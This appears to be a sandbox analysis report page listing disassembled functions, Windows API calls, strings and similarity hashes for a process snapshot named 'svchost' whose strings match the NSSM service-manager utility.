Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Heap$AllocConfig2ErrorLastProcessQueryService
String ID: SERVICE_CONFIG_DESCRIPTION$get_service_description()
API String ID: 2527037045-119971955
Opcode ID: 9949ae250d6f60cbc6c2d3ad254c89fe22e4bd7663aaf79f323aa80c9ae87168
Instruction ID: 3e5ba4e39e1bc183658cdb8e0b0057f10ea9e025a726a76105c97a4cff3da096
Opcode Fuzzy Hash: 9949ae250d6f60cbc6c2d3ad254c89fe22e4bd7663aaf79f323aa80c9ae87168
Instruction Fuzzy Hash: 103137F2A413017BE200A7A6EC46FEBB35CDF95729F10052AF509E61C1DAB9D840866A

Function 00410940 Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 252COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 00410980
GetProcessAffinityMask.KERNEL32(00000000), ref: 00410987

Strings

All, xrefs: 004109A9

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID: All
API String ID: 1231390398-55916349
Opcode ID: 3cc79894fb783cbacc77b87bc96894dd0151df03ecdf7f3147d36d3e41e83904
Instruction ID: 4f50b5df6772471c36ec06a59c3137138f5c5bb65052f92276dbeda9fd140f86
Opcode Fuzzy Hash: 3cc79894fb783cbacc77b87bc96894dd0151df03ecdf7f3147d36d3e41e83904
Instruction Fuzzy Hash: 0371E5B29043016BD710DF69DC85AAB77E8EFC4358F444A2EF944D3341E678ED848B6A

Function 004089B0 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 160timefileCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 004089E3
CreateFileW.KERNEL32(?,00000000,00000007,00000000,00000003,00000080,00000000), ref: 004089F8
GetFileInformationByHandle.KERNEL32(00000000,?), ref: 00408A0E
SystemTimeToFileTime.KERNEL32(?,?), ref: 00408A32
CloseHandle.KERNEL32(00000000), ref: 00408A49
SystemTimeToFileTime.KERNEL32(?,?), ref: 00408A5D
CompareFileTime.KERNEL32(?,?,?,00000000,FF676980,000000FF), ref: 00408A90
FileTimeToSystemTime.KERNEL32(?,?), ref: 00408AD6
MoveFileW.KERNEL32(?,?), ref: 00408AF7
GetLastError.KERNEL32 ref: 00408B1D
SystemTimeToFileTime.KERNEL32(?,?), ref: 00408B54
GetLastError.KERNEL32 ref: 00408B5F

Strings

MoveFile(), xrefs: 00408B7F
CreateFile(), xrefs: 00408B34

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Time$File$System$ErrorHandleLast$CloseCompareCreateInformationMove
String ID: CreateFile()$MoveFile()
API String ID: 1279283993-2404744241
Opcode ID: 25552cb11b5ace56ecd3b2e5a937ca093c4a3363743169b4a7c3585eb8c3d0c6
Instruction ID: dbd175fc6890c416a4f9d1aeb2e25f209b5034f3b8b6a35462ec3c9fcbbef7c3
Opcode Fuzzy Hash: 25552cb11b5ace56ecd3b2e5a937ca093c4a3363743169b4a7c3585eb8c3d0c6
Instruction Fuzzy Hash: 7951B2B1604300AFD321DF50DD85EEF77A8FF88704F44492EF6C992181DB78A9448B6A

Function 004105B0 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 223registryCOMMON

Download Yara Rule

APIs

__snwprintf_s.LIBCMT ref: 00410665
RegDeleteValueW.ADVAPI32(00000000,?), ref: 00410678
RegCloseKey.ADVAPI32(00000000), ref: 00410681
__snwprintf_s.LIBCMT ref: 004106E3
__wcsnicmp.LIBCMT ref: 0041070C
_fwprintf.LIBCMT ref: 0041075F
RegSetValueExW.ADVAPI32(00000000,?,00000000,00000001,?,?), ref: 004107D2
GetLastError.KERNEL32(?,?), ref: 004107DC
RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00410809
RegCloseKey.ADVAPI32(00000000,?,?), ref: 00410815

Strings

%s, xrefs: 00410751
default, xrefs: 004105DE

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Close$Value__snwprintf_s$DeleteErrorLast__wcsnicmp_fwprintf
String ID: %s$default
API String ID: 3151773479-387093873
Opcode ID: a3eb8f7cbf097436222cf15ca32937873149e64d54cf7f047a34555ee42af66f
Instruction ID: 30a3df3cfbea9975472b600d8026b2d659796aa5a5751022936202a7496980d0
Opcode Fuzzy Hash: a3eb8f7cbf097436222cf15ca32937873149e64d54cf7f047a34555ee42af66f
Instruction Fuzzy Hash: 5F613BB1A043006BD210AB65DD46FEB73989F84308F44452AF95592282F7FCE9D5CAAE

Function 0040EC60 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 220memoryCOMMON

Download Yara Rule

APIs

__snwprintf_s.LIBCMT ref: 0040ECD9
ChangeServiceConfigW.ADVAPI32(?,?,?,000000FF,00000000,00000000,00000000,0041E5D8,?,00000000,?,?,?,00000000), ref: 0040ED79
GetProcessHeap.KERNEL32(00000000,?,?,?,00000000), ref: 0040ED8E
HeapFree.KERNEL32(00000000,?,?,00000000), ref: 0040ED95
GetLastError.KERNEL32(?,?,00000000), ref: 0040ED9B

Strings

LocalSystem, xrefs: 0040ED23

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Heap$ChangeConfigErrorFreeLastProcessService__snwprintf_s
String ID: LocalSystem
API String ID: 3404593348-3718507506
Opcode ID: 41f063981e1366348621d5f49daee988617f9f6c866f27ec98b904e9930f1709
Instruction ID: 6c351189403f5eb6c5fe8513cea9cc0aa6b3904080e0031a5e5be75d4344df1b
Opcode Fuzzy Hash: 41f063981e1366348621d5f49daee988617f9f6c866f27ec98b904e9930f1709
Instruction Fuzzy Hash: 9071ECF1904701ABE720DB65DC49FA773A8EF84308F048D3EF559A22C1E778E8558769

Function 00410090 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 149registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040D950: GetProcessHeap.KERNEL32(00000008,00070510,?,00406684), ref: 0040D958
Part of subcall function 0040D950: HeapAlloc.KERNEL32(00000000,?,00406684), ref: 0040D95F

__snwprintf_s.LIBCMT ref: 004100BB

Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748

RegisterServiceCtrlHandlerExW.ADVAPI32(NSSM,0040F310,00000000), ref: 0041016B
GetLastError.KERNEL32(00000000), ref: 0041017C

Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460

Strings

NSSM, xrefs: 0041012E
service->name, xrefs: 004100CD
service_main(), xrefs: 004100C8

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Event$HeapRegisterSource$AllocCtrlDeregisterErrorHandlerLastProcessReportService__snwprintf_s__vsnwprintf_s_l
String ID: NSSM$service->name$service_main()
API String ID: 4131733493-2082882489
Opcode ID: 6ac95fc9643b6a64bb1cb5c6de92dade781988db5d66d8b08e3ebf056326ab07
Instruction ID: 09d4c8929dcbfacbdd4c1d483c8683e469f37797597802ee5f3465e219f8d35a
Opcode Fuzzy Hash: 6ac95fc9643b6a64bb1cb5c6de92dade781988db5d66d8b08e3ebf056326ab07
Instruction Fuzzy Hash: 3851A8F1E40700EFD320AF759C46BD77BA8AB44319F40853FF65E96242D2BD68848B69

Function 00412120 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 149memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 0041219F
HeapFree.KERNEL32(00000000), ref: 004121A6

Strings

%s, xrefs: 00412209, 00412224
SERVICE_INTERACTIVE_PROCESS, xrefs: 00412146, 0041221F
SERVICE_WIN32_OWN_PROCESS, xrefs: 004121D5, 00412204
LocalSystem, xrefs: 00412186, 004121AE

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Heap$FreeProcess
String ID: %s$LocalSystem$SERVICE_INTERACTIVE_PROCESS$SERVICE_WIN32_OWN_PROCESS
API String ID: 3859560861-1492594695
Opcode ID: 33fa03d751a25fb42394721696a2fbae633dc317f90b51ed7800875141e1fc40
Instruction ID: ce946582b93cb946955dea2ec205cb75b91bbb2897729394130ecaaa05bb3734
Opcode Fuzzy Hash: 33fa03d751a25fb42394721696a2fbae633dc317f90b51ed7800875141e1fc40
Instruction Fuzzy Hash: E231C3B3D4420137E6006676BC4AFDB73089F51339F140627F924E62C2FAB9DCD186A9

Function 00401580 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 137COMMON

Download Yara Rule

Strings

lsa_canon, xrefs: 0040168E
username_sid, xrefs: 00401689

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: ErrorOpenPolicyStatus
String ID: lsa_canon$username_sid
API String ID: 3835286460-3440772048
Opcode ID: 4be24f8c859b4fd8f73fde33ddbbb5feb2b1e283fdf2ddda045c7394c8cdc431
Instruction ID: c21e6304ed427eea8d7a4b8d0c36af05136f334d03c0e194f28452d20308fd16
Opcode Fuzzy Hash: 4be24f8c859b4fd8f73fde33ddbbb5feb2b1e283fdf2ddda045c7394c8cdc431
Instruction Fuzzy Hash: C641E3B59042017BD300FB69CC96DAB73E9FFC4708F44881EF58897252E678D99487A6

Function 0040EA00 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 133memorysynchronizationCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,00000000,771AE010,?), ref: 0040EA3B
HeapAlloc.KERNEL32(00000000), ref: 0040EA42
__snwprintf_s.LIBCMT ref: 0040EA5C
__snwprintf_s.LIBCMT ref: 0040EA83
SetServiceStatus.ADVAPI32(?,?), ref: 0040EADA
__snwprintf_s.LIBCMT ref: 0040EAF3
__snwprintf_s.LIBCMT ref: 0040EB07
WaitForSingleObject.KERNEL32(?,?), ref: 0040EB40

Strings

%s(), xrefs: 0040EA53
%lu, xrefs: 0040EA75, 0040EAE5, 0040EAF9

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: __snwprintf_s$Heap$AllocObjectProcessServiceSingleStatusWait
String ID: %lu$%s()
API String ID: 3479796768-699940799
Opcode ID: e71cb8d17e41331fe53131b87f854323c29ecb78752b37c52de2a023a38e2165
Instruction ID: 89c68062588a5b6a5dcd3b42c23b9f1343587bb4bcf2e221744147efb473305d
Opcode Fuzzy Hash: e71cb8d17e41331fe53131b87f854323c29ecb78752b37c52de2a023a38e2165
Instruction Fuzzy Hash: 6B41B7B1A04300EBD620DF65DD85F9B73A8FB84714F104A2EB669932C0E778E954CB69

Function 004054A0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 91windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00405370: GetUserDefaultLangID.KERNEL32(00401059,0000FFFF,00000000,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 0040537F
Part of subcall function 00405370: FormatMessageW.KERNEL32(00000B00,00000000,0040547B,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 0040539B
Part of subcall function 00405370: FormatMessageW.KERNEL32(00000B00,00000000,0040547B,00000000,00401059,0000FFFF,00000000,?,?,?,?,0040547B,40000206,?,00401059,-00000040), ref: 004053B4
Part of subcall function 00405370: GetProcessHeap.KERNEL32(00000000,00000040,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 004053BD
Part of subcall function 00405370: HeapAlloc.KERNEL32(00000000,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 004053C4
Part of subcall function 00405370: __snwprintf_s.LIBCMT ref: 004053DC

MessageBoxW.USER32(00000000,The message which was supposed to go here is missing!,NSSM,00000030), ref: 004054E4
__strftime_l.LIBCMT ref: 00405516
LocalFree.KERNEL32(00000000), ref: 00405523
MessageBoxW.USER32(00000000,The message which was supposed to go here is too big!,NSSM,00000030), ref: 00405537

Strings

NSSM, xrefs: 004054D9, 0040552B, 004055A4
The message which was supposed to go here is missing!, xrefs: 004054DE
The message which was supposed to go here is too big!, xrefs: 00405530
e, xrefs: 004055BC
(, xrefs: 0040557F

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Message$FormatHeap$AllocDefaultFreeLangLocalProcessUser__snwprintf_s__strftime_l
String ID: ($NSSM$The message which was supposed to go here is missing!$The message which was supposed to go here is too big!$e
API String ID: 3053442334-353540380
Opcode ID: eef27968d068f8b1e99ffeeeb08f58d77e7ebdd7b0cc62038cf6a803b3575ee0
Instruction ID: 9a0a8de4c5d0dfbf6e97c11b6962cbdff5b354b3c8bec1d6dae1fd1358dc6512
Opcode Fuzzy Hash: eef27968d068f8b1e99ffeeeb08f58d77e7ebdd7b0cc62038cf6a803b3575ee0
Instruction Fuzzy Hash: EB315EB1905301AFD350DF29D845B9FBBE4EF88354F40493EF959D2241E7788648CB9A

Function 0040D690 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 117memoryCOMMON

Download Yara Rule

APIs

QueryServiceConfig2W.ADVAPI32(00000002,00000003,00000000,00000000,00000000,00000000,00000000,00000000,00000002,0040DDED,00000002,?,00000000,00008400), ref: 0040D6D3
GetLastError.KERNEL32 ref: 0040D6DB
GetProcessHeap.KERNEL32(00000000,?), ref: 0040D6ED
HeapAlloc.KERNEL32(00000000), ref: 0040D6F4

Strings

SERVICE_CONFIG_DELAYED_AUTO_START_INFO, xrefs: 0040D791
get_service_startup(), xrefs: 0040D700
SERVICE_DELAYED_AUTO_START_INFO, xrefs: 0040D705, 0040D7AC

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Heap$AllocConfig2ErrorLastProcessQueryService
String ID: SERVICE_CONFIG_DELAYED_AUTO_START_INFO$SERVICE_DELAYED_AUTO_START_INFO$get_service_startup()
API String ID: 2527037045-1869567720
Opcode ID: bf1bcd56317e02efd2dd7698e4ba2d83c3c3b2c1e479c8237d6ba54ce11f5d08
Instruction ID: 097b29a2a90f646509759188dcc962e1ab6821ba756d97a4ddf6cf1ac72e26d1
Opcode Fuzzy Hash: bf1bcd56317e02efd2dd7698e4ba2d83c3c3b2c1e479c8237d6ba54ce11f5d08
Instruction Fuzzy Hash: B531D4F6A403016BE310DFA9DC89FAB7798EB84315F54487AF504E7281E778E8448A69

Function 00409130 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 114memorypipethreadCOMMON

Download Yara Rule

APIs

CreatePipe.KERNEL32(?,?,00000000,00000000), ref: 0040915B
SetHandleInformation.KERNEL32(00000000,00000001,00000001,?,?,00000000,00000000), ref: 0040916C
GetProcessHeap.KERNEL32(00000008,00000030), ref: 00409176
HeapAlloc.KERNEL32(00000000), ref: 0040917D
GetLastError.KERNEL32(?,?,00000000,00000000), ref: 004091A9
CreateThread.KERNEL32(00000000,00000000,Function_00008D50,00000000,00000000,?), ref: 00409222
GetLastError.KERNEL32(00000000), ref: 0040922F
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00409250
HeapFree.KERNEL32(00000000), ref: 00409257

Strings

logger, xrefs: 0040918F
create_logging_thread(), xrefs: 0040918A

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Heap$CreateErrorLastProcess$AllocFreeHandleInformationPipeThread
String ID: create_logging_thread()$logger
API String ID: 3682172063-2332508298
Opcode ID: 5364c44dd14288a0f0078d0c2a26264fb7274c226d6cf196836e5ebcf69bdcaf
Instruction ID: 7a5f417da971cce8bdb4d489e7d561c2bea4d1d3adffcb45d960dbf457daacd4
Opcode Fuzzy Hash: 5364c44dd14288a0f0078d0c2a26264fb7274c226d6cf196836e5ebcf69bdcaf
Instruction Fuzzy Hash: 5731A0B1A00701AFD3209F65DC49F9BB7E8EF88714F10892EF649E7291D674E8408B59

Function 0040A1E0 Relevance: 18.1, APIs: 12, Instructions: 125processthreadCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0040A1EA
GetLastError.KERNEL32(00000000), ref: 0040A1F6

Part of subcall function 004052C0: TlsGetValue.KERNEL32(00000014,?,00401042,00000000,00000000), ref: 004052C7
Part of subcall function 004052C0: LocalAlloc.KERNEL32(00000040,0000FFFF,?,00401042,00000000,00000000), ref: 004052DA

Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460

Thread32First.KERNEL32 ref: 0040A24E
GetLastError.KERNEL32(00000000), ref: 0040A258
CloseHandle.KERNEL32(00000000), ref: 0040A27D

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Event$ErrorLastSource$AllocCloseCreateDeregisterFirstHandleLocalRegisterReportSnapshotThread32Toolhelp32Value
String ID:
API String ID: 414364297-0
Opcode ID: 4638767dc103a9e6a31185ccdf1f383c447c27e4fd120cc99bc6f3ea7aaed1db
Instruction ID: 89f48a4cf6a9a6b2169b356681f18064eeb06023b63748c5040493b97caa791b
Opcode Fuzzy Hash: 4638767dc103a9e6a31185ccdf1f383c447c27e4fd120cc99bc6f3ea7aaed1db
Instruction Fuzzy Hash: 9131B6B1504300AFD300EF659D45FAB77E8EF84318F84487EF549E3282E634E9158BAA

Function 0040E830 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 144sleepsynchronizationtimeCOMMON

Download Yara Rule

APIs

__snwprintf_s.LIBCMT ref: 0040E8A3
__snwprintf_s.LIBCMT ref: 0040E8ED
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E921
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,00000000,FFFFD8F0,000000FF), ref: 0040E95C
SetServiceStatus.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E97A
SleepConditionVariableCS.KERNELBASE(?,?,?), ref: 0040E998
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E99F
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E9C4
Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E9DD

Strings

%lu, xrefs: 0040E895, 0040E8DF

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: CriticalSectionSleep__snwprintf_s$ConditionEnterLeaveObjectServiceSingleStatusTimerVariableWaitWaitable
String ID: %lu
API String ID: 418212672-685833217
Opcode ID: d4d9859d66ea56a1125a05eea6eb692c0986071de63174207467bd870c1a4a4e
Instruction ID: 0bcbe74f60e49559a2a01a7623a54cf792aad81448e6a6f2708ebc24a96566d6
Opcode Fuzzy Hash: d4d9859d66ea56a1125a05eea6eb692c0986071de63174207467bd870c1a4a4e
Instruction Fuzzy Hash: 5141DCF1A04700EBD7249B25CC46BDB73D4BB88314F508B2EF25EA61C0E67CA945C759

Function 00410DA0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 141memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?), ref: 00410E22
HeapFree.KERNEL32(00000000), ref: 00410E29

Strings

AppEnvironment, xrefs: 00410E96

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Heap$FreeProcess
String ID: AppEnvironment
API String ID: 3859560861-948859433
Opcode ID: 04cadfac52257cf83fd6566f2c35dc0dcf809a10a3b222f8c10f06632aaf1ac7
Instruction ID: d0ab22901641b4708907b5ad450eb196165ffe8a0ecf88f64d9a13dda8279097
Opcode Fuzzy Hash: 04cadfac52257cf83fd6566f2c35dc0dcf809a10a3b222f8c10f06632aaf1ac7
Instruction Fuzzy Hash: 724106B2A042016BE2009B69EC09FEB37A8DFC4725F14492EF515D62D1DBB8D8C5C76A

Function 0040CD30 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,0040DD63,00000003,00000000,00000002,?,0040DD63,00000002,00000000), ref: 0040CD48
GetLastError.KERNEL32(?,0040DD63,00000002,00000000), ref: 0040CD50
GetProcessHeap.KERNEL32(00000008,0040DD63,00000000,?,0040DD63,00000002,00000000), ref: 0040CD63
HeapAlloc.KERNEL32(00000000,?,0040DD63,00000002,00000000), ref: 0040CD6A
QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?,?,0040DD63,00000002,00000000), ref: 0040CD94
GetProcessHeap.KERNEL32(00000000,00000000,?,0040DD63,00000002,00000000), ref: 0040CD9C
HeapFree.KERNEL32(00000000,?,0040DD63,00000002,00000000), ref: 0040CDA3
GetLastError.KERNEL32(00000000,?,0040DD63,00000002,00000000), ref: 0040CDAB

Strings

QUERY_SERVICE_CONFIG, xrefs: 0040CD7C
query_service_config(), xrefs: 0040CD77

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
